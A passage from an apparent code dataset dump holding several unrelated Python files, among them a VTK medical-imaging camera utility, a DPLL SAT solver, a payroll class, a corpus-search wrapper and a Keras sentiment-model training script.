If the volume is not orthogonal , then eys_dir should be re-calculated for MPRs\n :param orientation:\n :return:\n \"\"\"\n MIN_TOLERANCE = 0.000001\n dot_x_y = np.dot(orientation[0], orientation[1])\n dot_x_z = np.dot(orientation[0], orientation[2])\n dot_y_z = np.dot(orientation[1], orientation[2])\n\n if dot_x_y > MIN_TOLERANCE or dot_x_z > MIN_TOLERANCE or dot_y_z > MIN_TOLERANCE:\n return False\n else:\n return True\n\n\ndef get_default_mpr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL: render_common.PositionType.TRANSVERSAL:\n :param camera: camera is the output result\n :param same_aspect_ratio: when TRA(横), COR(冠), SAG(矢), should be in the same scale, then the flag should be true\n :return:\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 1\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 1, max_extent * 6)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? 
In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_default_vr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL: render_common.PositionType.TRANSVERSAL:\n :param camera: camera is the output result\n :param same_aspect_ratio: when TRA(横), COR(冠), SAG(矢), should be in the same scale, then the flag should be true\n :return:\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 3\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 
2.5, max_extent * 3.5)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_slice_axis_matrix(camera):\n \"\"\"\n The function usually used to set matrix of MPR\n :param camera:\n :return:\n \"\"\"\n # Step1: calculate z_dir\n camera_pos = camera.GetPosition()\n camera_focal = camera.GetFocalPoint()\n z_dir = [camera_pos[0] - camera_focal[0], camera_pos[1] - camera_focal[1], camera_pos[2] - camera_focal[2]]\n z_dir_norm = np.linalg.norm(z_dir, ord=2)\n z_dir_normalized = z_dir / z_dir_norm\n render_common.logging.info(\"z_dir_normalized\" + str(z_dir_normalized[0])\n + str(z_dir_normalized[1]) + str(z_dir_normalized[2]))\n # Step2: Calculate y_dir\n camera_view_up = camera.GetViewUp()\n camera_view_up = camera_view_up / np.linalg.norm(camera_view_up)\n\n # Step3: Calculate x_dir\n x_dir_normal = np.cross(camera_view_up, z_dir_normalized)\n\n # Step4: Get SliceAxis Matrix of MPR\n return ((x_dir_normal[0], camera_view_up[0], z_dir_normalized[0], camera_focal[0],\n x_dir_normal[1], camera_view_up[1], z_dir_normalized[1], camera_focal[1],\n x_dir_normal[2], camera_view_up[2], z_dir_normalized[2], camera_focal[2],\n 0, 0, 0, 1))\n\n\ndef np_2_vtkMatrix(mat):\n if mat.shape == (4, 4):\n obj = vtk.vtkMatrix4x4()\n for i in range(4):\n for j in range(4):\n obj.SetElement(i, j, mat[i, j])\n return obj\n\n\ndef vtkMatrix_to_np(vtk_mat):\n if isinstance(vtk_mat, vtk.vtkMatrix4x4):\n np_mat = np.matrix(np.arange(16).reshape(4, 4), dtype=float)\n if np_mat.shape == (4, 4):\n for i in range(4):\n for j in range(4):\n np_mat[i, j] = vtk_mat.GetElement(i, j)\n return np_mat\n\n\ndef get_view_matrix(camera):\n return vtkMatrix_to_np(camera.GetViewTransformMatrix)\n\n\ndef get_projection_matrix(scene):\n camera = scene.get_camera()\n projection_matrix = camera.GetProjectionTransformMatrix(scene.get_render())\n return vtkMatrix_to_np(projection_matrix)\n\n\ndef tranform_world_to_screen_vtk_inner(vtk_view_port, vtk_camera, point3dworld):\n # World2View Tranform\n cur_camera = vtk_camera\n vtk_view_port.ComputeAspect()\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n point3dworld[3] = 1.0\n x0 = mat_vp.GetElement(0, 0)*point3dworld[0] + mat_vp.GetElement(0, 1)*point3dworld[1] \\\n + mat_vp.GetElement(0, 2)*point3dworld[2] + mat_vp.GetElement(0, 3)*point3dworld[3]\n x1 = mat_vp.GetElement(1, 0) * point3dworld[0] + 
mat_vp.GetElement(1, 1) * point3dworld[1] \\\n + mat_vp.GetElement(1, 2) * point3dworld[2] + mat_vp.GetElement(1, 3) * point3dworld[3]\n x2 = mat_vp.GetElement(2, 0) * point3dworld[0] + mat_vp.GetElement(2, 1) * point3dworld[1] \\\n + mat_vp.GetElement(2, 2) * point3dworld[2] + mat_vp.GetElement(2, 3) * point3dworld[3]\n x3 = mat_vp.GetElement(3, 0) * point3dworld[0] + mat_vp.GetElement(3, 1) * point3dworld[1] \\\n + mat_vp.GetElement(3, 2) * point3dworld[2] + mat_vp.GetElement(3, 3) * point3dworld[3]\n\n point4d_view = [x0, x1, x2, x3]\n if point4d_view[3] != 0:\n point4d_view = [point4d_view[0] / point4d_view[3], point4d_view[1] / point4d_view[3],\n point4d_view[2] / point4d_view[3], point4d_view[3] / point4d_view[3]]\n\n vtk_view_port.SetViewPoint([point4d_view[0], point4d_view[1], point4d_view[2]])\n vtk_view_port.ViewToDisplay()\n point3d_screen = vtk_view_port.GetDisplayPoint()\n return point3d_screen\n\n\ndef transform_world_to_screen_vtk(scene, point3dworld):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return tranform_world_to_screen_vtk_inner(cur_renderer, cur_camera, point3dworld)\n\n\ndef transform_screen_to_world_vtk_inner(vtk_view_port, vtk_camera, point3dscreen):\n # Screen2View Transform\n vtk_view_port.SetDisplayPoint(point3dscreen)\n vtk_view_port.DisplayToView()\n point3dscreen = vtk_view_port.GetViewPoint() # Range in [-1, 1]\n\n # View2World Transform\n cur_camera = vtk_camera\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n mat_vp_invert = vtk.vtkMatrix4x4()\n vtkMatrix4x4.Invert(mat_vp, mat_vp_invert)\n point4dscreen = [point3dscreen[0], point3dscreen[1], point3dscreen[2], 1.0]\n x0 = mat_vp_invert.GetElement(0, 0)*point4dscreen[0] + mat_vp_invert.GetElement(0, 1)*point4dscreen[1] \\\n + mat_vp_invert.GetElement(0, 2)*point4dscreen[2] + mat_vp_invert.GetElement(0, 3)*point4dscreen[3]\n x1 = mat_vp_invert.GetElement(1, 0) * point4dscreen[0] + mat_vp_invert.GetElement(1, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(1, 2) * point4dscreen[2] + mat_vp_invert.GetElement(1, 3) * point4dscreen[3]\n x2 = mat_vp_invert.GetElement(2, 0) * point4dscreen[0] + mat_vp_invert.GetElement(2, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(2, 2) * point4dscreen[2] + mat_vp_invert.GetElement(2, 3) * point4dscreen[3]\n x3 = mat_vp_invert.GetElement(3, 0) * point4dscreen[0] + mat_vp_invert.GetElement(3, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(3, 2) * point4dscreen[2] + mat_vp_invert.GetElement(3, 3) * point4dscreen[3]\n\n point4d_world = [x0, x1, x2, x3]\n if point4d_world[3] != 0:\n point4d_world = [point4d_world[0] / point4d_world[3], point4d_world[1] / point4d_world[3],\n point4d_world[2] / point4d_world[3], point4d_world[3] / point4d_world[3]]\n return [point4d_world[0], point4d_world[1], point4d_world[2]]\n\n\ndef transform_screen_to_world_vtk(scene, point3dscreen):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return transform_screen_to_world_vtk_inner(cur_renderer, cur_camera, point3dscreen)\n\n\ndef transform_screen_to_world_zwh(scene, point2d):\n cur_renderer = scene.get_render()\n picker = vtkWorldPointPicker()\n picker.Pick(point2d[0], point2d[1], 0, cur_renderer)\n last_point = picker.GetPickPosition()\n return last_point\n\n\ndef transform_screen_to_world(scene, point2d):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n point3d_screen = [point2d[0], point2d[1], 0.0]\n return 
transform_screen_to_world_vtk(scene, point3d_screen)\n\n\ndef transform_world_to_screen(scene, point3d_world):\n    \"\"\"\n    Transform a 3D world point into 2D screen coordinates.\n    :param scene: scene providing the renderer and the camera\n    :param point3d_world: (x, y, z) world coordinates\n    :return: the corresponding (x, y) screen point\n    \"\"\"\n    screen3d = transform_world_to_screen_vtk(scene, [point3d_world[0], point3d_world[1], point3d_world[2], 1.0])\n    return [screen3d[0], screen3d[1]]\n\n","sub_path":"visualization/camera_utility.py","file_name":"camera_utility.py","file_ext":"py","file_size_in_byte":25907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"438130645","text":"class Point:\n    def __init__(self, x, y, color=\"\"):\n        self.x = x\n        self.y = y\n        self.color = color\n\nclass Circle:\n    def __init__(self, center, radius, color=''):\n        self.center = center\n        self.radius = checkValue(radius, \"radius\")\n        self.color = color\n\nclass Rect:\n    def __init__(self, center, width, height, color=''):\n        self.center = center\n        self.width = checkValue(width, \"width\")\n        self.height = checkValue(height, \"height\")\n        self.color = color\n\nclass Polygon:\n    def __init__(self, points, color=''):\n        self.points = points\n        self.color = color\n\ndef checkValue(val, attribute):\n    if val > 0:\n        return val\n    else:\n        print(\"Error: \" + attribute + \" must be greater than 0\")\n        exit(1)\n","sub_path":"src/model/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"387161054","text":"from copy import deepcopy\n# import pdb\n\n\ndef has_singleatom(A):\n    for sublist in A:\n        if len(sublist) == 1:\n            return True\n    return False\n\n\ndef has_empty(A):\n    for sublist in A:\n        if len(sublist) == 0:\n            return True\n    return False\n\n\ndef complement(atom):\n    if atom[0] == '-':\n        return atom[1:]  # strip the leading '-'; atom[1] would break multi-character atom names\n    else:\n        return '-' + atom\n\n\ndef is_negation(atom):\n    if atom[0] == '-':\n        return True\n    else:\n        return False\n\n\ndef unitPropagate(A, partial):\n    # pdb.set_trace()\n    while has_singleatom(A):\n        for sublist in A:\n            if len(sublist) == 1:\n                pureatom = sublist[0]\n                suppose(pureatom, A, partial)\n                # suppose() mutates A, so restart the scan instead of\n                # continuing to iterate over the modified list\n                break\n\n\ndef find_unassigned(wholelist, I):\n    for sublist in wholelist:\n        for atom in sublist:\n            if is_negation(atom):\n                check = complement(atom)\n            else:\n                check = atom\n            if I.get(check, -1) == -1:\n                return check\n\n\ndef suppose(pureatom, A, I):\n    if (is_negation(pureatom)):\n        assert I.get(complement(pureatom), -1) == -1, 'Atom already assigned'\n        I[complement(pureatom)] = 0\n    else:\n        assert I.get(pureatom, -1) == -1, 'Atom already assigned'\n        I[pureatom] = 1\n\n    pureatom_complement = complement(pureatom)\n    i = 0\n    while i != len(A):\n        sublist = A[i]\n        if pureatom in sublist:\n            A.pop(i)\n            i = 0\n            continue\n        elif pureatom_complement in sublist:\n            sublist.remove(pureatom_complement)\n        i += 1\n\n\ndef DPLL(S, I):\n    unitPropagate(S, I)\n    if has_empty(S):\n        return 'Insatisfacible', {}\n    if len(S) == 0:\n        return 'Satisfacible', I\n\n    l = find_unassigned(S, I)\n    S_prime = deepcopy(S)\n    I_prime = deepcopy(I)\n    suppose(l, S_prime, I_prime)\n    maybe, S_prime_prime = DPLL(S_prime, I_prime)\n    if maybe == 'Satisfacible':\n        return 'Satisfacible', S_prime_prime\n    else:\n        S_prime2 = deepcopy(S)\n        I_prime2 = deepcopy(I)\n        suppose(complement(l), S_prime2, I_prime2)\n        return DPLL(S_prime2, I_prime2)\n","sub_path":"DPLL.py","file_name":"DPLL.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"595263623","text":"# Functions with and without parameters, and with return values\ndef show(name, age):\n    
print(\"My name is %s, I am %d years old\" % (name, age))\n\n\nshow(\"chen\", 28)\n\n\ndef return_value(name):\n    return \"hello \" + name\n\n\nres = return_value(\"chen\")\nprint(res)\n\n\n# Default-argument function: the parameters already have values when the function is defined\ndef sum_name(a=1, b=2):\n    return a + b\n\n\nprint(sum_name())\nprint(sum_name(3, 5))\nprint(sum_name(b=3, a=4))  # keyword arguments: the order does not matter\n\n\n# Variable-length positional arguments: received as a tuple; they cannot be passed by keyword\ndef sum_num(*args):\n    print(args, type(args))\n\n    r = 0\n    for i in args:\n        r += i\n    return r\n\n\nrr = sum_num(1, 2, 3)\nprint(rr)\n\n\n# Variable-length keyword arguments: received as a dict; they must be passed as key=value pairs\ndef sum_dict(**kwargs):\n    print(kwargs, type(kwargs))\n\n    for key, value in kwargs.items():\n        print(key, value)\n\n\nsum_dict(a=1, b=2, c=3, name=\"tom\")","sub_path":"python_basic/day03/01-函数定义.py","file_name":"01-函数定义.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"41655513","text":"\"\"\"\ncs1114\n\nSubmission: rec08\n\nProgrammer: Yogesh Dhamija\nUsername: yad220\n\nThis module contains the Company type. \n\"\"\"\n\nfrom hw10_worker import *\n\nCOMPANY_DUPLICATE_WORKER_ERROR = 10001\nCOMPANY_NEGATIVE_HOURS_ERROR = 12345\nCOMPANY_TOO_LOW_WAGE_ERROR = 76547\nCOMPANY_TOO_HIGH_WAGE_ERROR = 67583\n\nCOMPANY_SUCCESS_CODE = 11111\n\nclass Company(object):\n\t\n\tdef __init__(self, name):\n\t\tself.__name = name\n\t\tself.__workers = {}\n\t\n\tdef addWorker(self, ssn, name):\n\t\t\"\"\"Add a new worker; fails if the SSN is already registered.\"\"\"\n\t\tnewWorker = WorkerRec(ssn, name)\n\t\t# compare against the stored SSN keys, not the WorkerRec object itself\n\t\tif newWorker.getSSN() in self.__workers.keys():\n\t\t\treturn COMPANY_DUPLICATE_WORKER_ERROR\n\t\telse:\n\t\t\tself.__workers[newWorker.getSSN()] = newWorker\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef addWorkerHours(self, ssn, hours):\n\t\t\"\"\"Add hours worked for the worker with the given SSN.\"\"\"\n\t\tcode = self.__workers[ssn].addHours(hours)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_NEGATIVE_HOURS_ERROR):\n\t\t\treturn COMPANY_NEGATIVE_HOURS_ERROR\n\t\n\tdef changeWorkerRate(self, ssn, rate):\n\t\t\"\"\"Change the hourly rate of the worker with the given SSN.\"\"\"\n\t\tcode = self.__workers[ssn].setRate(rate)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_TOO_LOW_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_LOW_WAGE_ERROR\n\t\telif(code == WORKER_TOO_HIGH_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_HIGH_WAGE_ERROR\n\t\n\tdef changeWorkerTitle(self, ssn, title):\n\t\t\"\"\"Change the title of the worker with the given SSN.\"\"\"\n\t\tcode = self.__workers[ssn].setTitle(title)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef payAllWorkers(self):\n\t\t\"\"\"Pay every worker and write the pay records to '<company>.pay'.\"\"\"\n\t\tpayList = self.__payWorkersReturnList()\n\t\tpayList.sort()\n\t\twriteString = \"\"\n\t\tfor item in payList:\n\t\t\ttitleString = ' [%s]' % (item[3]) if item[3] != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(item[0], item[1], item[2], titleString)\n\t\tfilePath = \"%s.pay\" % (self.__name.strip())\n\t\thandle = open(filePath, 'w')\n\t\thandle.write(writeString)\n\t\thandle.close()\n\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef __payWorkersReturnList(self):\n\t\t\"\"\"Pay each worker and collect the [owed, SSN, name, title] records.\"\"\"\n\t\tpayList = []\n\t\t# Structure of payList is [ [owed, SSN, name, title], [owed, SSN, name, title], ... 
]\n\t\tfor item in self.__workers.values():\n\t\t\tcode = item.payWorker()\n\t\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\t\tpayList.append( [ item.getPay(), item.getSSN(), item.getName(), item.getTitle() ] )\n\t\treturn payList\n\t\n\tdef __makePrettyFormat(self, owed, ssn, name, title):\n\t\t\"\"\" \"\"\"\n\t\treturn (\"%i\\n%s $%0.2f%s\\n\") % (ssn, name, owed, title)\n\t\n\tdef fireWorker(self, ssn):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].payWorker()\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\tfilePath = \"%s.FINAL.pay\" % (self.__workers[ssn].getName())\n\t\t\twriteString = \"\"\n\t\t\ttitleString = ' [%s]' % (self.__workers[ssn].getTitle()) if self.__workers[ssn].getTitle() != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(self.__workers[ssn].getPay(), ssn, self.__workers[ssn].getName(), titleString)\n\t\t\thandle = open(filePath, 'w')\n\t\t\thandle.write(writeString)\n\t\t\thandle.close()\n\t\t\tdel(self.__workers[ssn])\n\t\t\treturn COMPANY_SUCCESS_CODE\n","sub_path":"Homework/hw10/hw10_company.py","file_name":"hw10_company.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"612667101","text":"# python3\n# coding=\n\nfrom collections import Iterable\nimport warnings\nfrom time import sleep\nfrom tqdm import tqdm\nfrom .result import Result\nfrom .corpora import *\n\n\nfunctions = {\n 'rus': rus_corpus,\n 'bam': bam_corpus,\n 'emk': emk_corpus,\n 'zho': zho_corpus,\n 'rus_parallel': rus_parallel_corpus,\n 'dan': dan_corpus,\n 'est': est_corpus,\n 'kat': kat_corpus\n }\n\n\nclass Corpus:\n def __init__(self, language, sleep_time=1, sleep_each=5):\n \"\"\"\n language: str: language alias\n sleep_time: int: sleeping time in seconds\n sleep_each: int: sleep after each `sleep_each` request\n \"\"\"\n \n self.language = language\n self.__corpus = functions[self.language] \n self.doc = self.__corpus.__doc__\n \n self.results = list()\n self.failed = list()\n self.__retry_flag = False\n \n self.__warn = 'Nothing found for query \"%s\".\\n' \\\n 'Call `retry_failed` method to retry failed queries'\n self.__pbar_desc = '\"%s\"'\n self.__type_except = 'Argument `query` must be of type or iterable, got <%s>'\n\n if sleep_each < 1:\n raise ValueError('Argument `sleep_each` must be >= 1')\n \n self.sleep_each = sleep_each\n self.sleep_time = sleep_time\n\n def search(self, query, *args, **kwargs):\n \"\"\"\n query: str: query\n for arguments see `params_container.Container`\n \"\"\"\n \n if isinstance(query, str):\n query = [query]\n \n if not isinstance(query, Iterable):\n raise TypeError(self.__type_except % type(query))\n \n if args:\n progress_total = args[0]\n elif 'numResults' in kwargs:\n progress_total = kwargs['numResults']\n else:\n progress_total = 100\n \n _results = list()\n \n for q in query:\n self.parser = self.__corpus.PageParser(q, *args, **kwargs)\n _r = Result(self.language, self.parser.__dict__)\n q_desc = self.__pbar_desc % q\n \n for t in tqdm(self.parser.extract(),\n total=progress_total,\n unit='docs',\n desc=q_desc):\n _r.add(t)\n if _r.N % self.sleep_each == 0:\n sleep(self.sleep_time)\n \n _results.append(_r)\n if _r.N < 1:\n warnings.warn(self.__warn % q)\n if not self.__retry_flag:\n self.failed.append(_r)\n \n if not self.__retry_flag:\n self.results.extend(_results)\n \n return _results\n\n def retry_failed(self):\n \"\"\"\n Calls `.search()` for failed queries stored in `.failed`\n \n ISSUE:\n if `_r` got successfully retrieved 
here,\n its empty `Result` is still left in `Corpus.results` \n \"\"\"\n if self.failed:\n self.__retry_flag = True\n _pos = list()\n _neg = list()\n \n for r in self.failed:\n _r = self.search(r.query, **r.params)[0]\n if _r.N > 0:\n _pos.append(_r)\n else:\n _neg.append(_r)\n \n self.failed = _neg[:]\n self.results.extend(_pos)\n self.__retry_flag = False\n \n return _pos\n \n else:\n return []\n","sub_path":"lingcorpora/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450282899","text":"import argparse\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nimport data_helper\nfrom random import shuffle\n\nfrom keras import backend as K\nfrom keras import models\nfrom keras import layers\nfrom keras import optimizers\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n args.add_argument('--strmaxlen', type=int, default=150)\n args.add_argument('--epochs', type=int, default=100)\n args.add_argument('--batch', type=int, default=10)\n args.add_argument('--embedding', type=int, default=256)\n args.add_argument('--featuresize', type=int, default=129) # ascii code 기준 0~127 + 1\n config = args.parse_args()\n\n inputs = layers.Input((config.strmaxlen,)) \n layer = layers.Embedding(config.featuresize, config.embedding, input_length=config.strmaxlen, mask_zero = True)(inputs)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=True))(layer)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=False))(layer)\n\n layer_dense = layers.Dense(3)(layer)\n outputs_softmax = layers.Activation('softmax')(layer_dense)\n\n model = models.Model(inputs=inputs, outputs=outputs_softmax)\n model.summary()\n model.compile(optimizer=optimizers.Adam(lr=0.001,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n \n file_train_instances = \"sample50.csv\" #데이터셋 파일 이름\n \n # Load data\n print(\"Loading data...\") \n sentences, sentimentlabels = data_helper.load_data_and_labels(file_train_instances,config.strmaxlen)\n \n dataset_len = len(sentences)\n one_batch_size = dataset_len//config.batch\n if dataset_len % config.batch != 0:\n one_batch_size += 1\n \n sentiment_dataset = list(zip(sentences,sentimentlabels))\n print(sentiment_dataset)\n \n # epoch마다 학습을 수행합니다.\n for epoch in range(config.epochs):\n avg_loss = 0.0\n avg_acc = 0.0\n \n shuffle(sentiment_dataset)\n for batch in enumerate(data_helper._batch_loader(sentiment_dataset, config.batch)):\n i = batch[0] # enumerate - index\n data, labels = zip(*batch[1]) #batch[1] = (data,labels) -> 이걸 data, labels로 분리한다.\n data = np.array(data) # numpy array화\n labels = np.array(labels) # numpy array화\n loss, acc = model.train_on_batch(data, labels)\n print('Batch : ', i + 1, '/', one_batch_size,\n ', loss in this minibatch: ', float(loss),\n ', acc in this minibatch: ', float(acc))\n avg_loss += float(loss)\n avg_acc += float(acc)\n \n print('epoch:', epoch, ' train_loss:', float(avg_loss/one_batch_size), ' train_acc:', float(avg_acc/one_batch_size)) \n filename = str(\"model-epoch \"+ str(epoch))\n model.save(filename)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"242057634","text":"import item\nimport date\nimport unittest\n\n#class TestSequenceFunctions(unittest.TestCase):\n\n#def setUp():\n\ndef test_chocoladeshot(self):\n\t\ttoday = 
